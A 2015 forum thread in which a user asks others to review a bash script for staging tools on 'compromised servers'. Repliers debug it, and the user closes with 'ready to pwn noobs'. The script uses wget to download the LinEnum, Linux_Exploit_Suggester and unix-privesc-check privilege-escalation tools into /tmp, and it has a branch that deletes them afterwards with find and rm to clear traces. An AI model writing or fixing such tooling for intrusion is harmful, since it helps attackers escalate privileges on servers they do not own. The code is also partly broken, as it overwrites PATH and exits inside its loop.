User Controls
Bash scripting
-
2015-11-17 at 3:11 PM UTCLike i was saying in this thread. I am collecting a few shell and perl scripts i founf a few but i''d like to automate getting them on compromised servers, now i posted this in the other thread already but i didn't get any replies so i think it deserves it's own thread.
Alright guys so i thought i have these three useful scripts now right. But it would be such a drag to have to manually 'wget' and unzip them one by one whenever i get into a server so figured i'd make a shellscript to do it for me. Now bare in mind my bash is not that good so i'd like to post it here so you guys can tell me how it looks and if it will do what i want it to do before i push it to github and embarres myself.
The purpose of the script after it gets executed is to check if any arguments have been passed. If there haven't it's going to download the three scripts i mentioned directly from github. After that it's going to unzip them to their own folder and exit. When you're done using the other scripts simply run it again with an argument to have it delete everything in the directory it was downloaded to. The target directory for all this would be the /tmp/ directory since it's most likely every user has read/write privilege there.
#!/bin/bash
DONE=$1
PATH="/tmp/"
if [ "$DONE" == "" ]
then
echo "Downloading and extracting scripts, when ready execute script with arg $1 to remove files after use"
`wget -O /tmp/file1.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
`wget -O /tmp/file2.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
`wget -O /tmp/file3.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
for zip in *.zip
do
dirname=`echo $zip | sed 's/\.zip$//'`
if mkdir $dirname
then
if cd $dirname
then
unzip ../$zip
cd ..
rm -f $zip
else
echo "Could not unpack $zip - cd failed"
fi
else
echo "Could not unpack $zip - mkdir failed"
fi
exit 1
else
echo ""Removing scripts""
find $PATH/* -exec rm {} \;
exit 2
fi
So how about it? Does this look about right? -
2015-11-17 at 6:17 PM UTClooks good. It might be worth pointing out `unzip` and `wget` aren't universally installed. I think unzip in particular has some license complications so it doesn't (or didn't for a time) come with Debian and similar distros. I think curl is slightly more widely available than wget but don't quote me on that. Probably not an issue in 2015 but something to keep in mind.
-
2015-11-17 at 8:43 PM UTC
looks good. It might be worth pointing out `unzip` and `wget` aren't universally installed. I think unzip in particular has some license complications so it doesn't (or didn't for a time) come with Debian and similar distros. I think curl is slightly more widely available than wget but don't quote me on that. Probably not an issue in 2015 but something to keep in mind.
Thanks so i pushed it to github and tested it on the server. But again i got no output for fuck's sake. Howecome when i run:
https://github.com/rebootuser/LinEnu...ter/LinEnum.sh
I do get output but when i run:
https://github.com/NullArray/RootHel.../roothelper.sh
I don't it, seems rather arbitrary and i don't like it al all. You sure it would work under normal circumstances? -
2015-11-18 at 1:39 AM UTCsorry, been busy, will test shortly
-
2015-11-18 at 1:41 AM UTCroothelper.sh: 29: roothelper.sh: Syntax error: "else" unexpected (expecting "done")
your last 'else' statement doesn't correspond with an opening 'if'; it looks like you messed up and added it where you should've added 'done' to close the do loop -
2015-11-18 at 1:52 AM UTCoh right, you meant to have that correspond to the if statement above the do loop
you need to close the do loop before you can move on to the next option in the if statement
working code:
#!/bin/bash
DONE=$1
PATH="/tmp/"
if [ "$DONE" == "" ]
then
echo "Downloading and extracting scripts, when ready execute script with arg $1 to remove files"
`wget -O /tmp/file1.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
`wget -O /tmp/file2.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
`wget -O /tmp/file3.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
for zip in *.zip
do
dirname=`echo $zip | sed 's/\.zip$//'`
if mkdir $dirname
then
if cd $dirname
then
unzip ../$zip
cd ..
rm -f $zip
else
echo "Could not unpack $zip - cd failed"
fi
else
echo "Could not unpack $zip - mkdir failed"
fi
exit 1
done
else
echo ""Removing scripts""
find $PATH/* -exec rm {} \;
exit 2
fi
all works ok except my terminal eats shit unless I specify full paths to find/rm/wget/etc, maybe because I don't have bash set up pr0perly -
2015-11-18 at 3:03 AM UTC
oh right, you meant to have that correspond to the if statement above the do loop
you need to close the do loop before you can move on to the next option in the if statement
working code:
#!/bin/bash
DONE=$1
PATH="/tmp/"
if [ "$DONE" == "" ]
then
echo "Downloading and extracting scripts, when ready execute script with arg $1 to remove files"
`wget -O /tmp/file1.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
`wget -O /tmp/file2.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
`wget -O /tmp/file3.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
for zip in *.zip
do
dirname=`echo $zip | sed 's/\.zip$//'`
if mkdir $dirname
then
if cd $dirname
then
unzip ../$zip
cd ..
rm -f $zip
else
echo "Could not unpack $zip - cd failed"
fi
else
echo "Could not unpack $zip - mkdir failed"
fi
exit 1
done
else
echo ""Removing scripts""
find $PATH/* -exec rm {} \;
exit 2
fi
all works ok except my terminal eats shit unless I specify full paths to find/rm/wget/etc, maybe because I don't have bash set up pr0perly
Thanks for testing i appreciate it. Got everything fixed up now ready to pwn noobs.
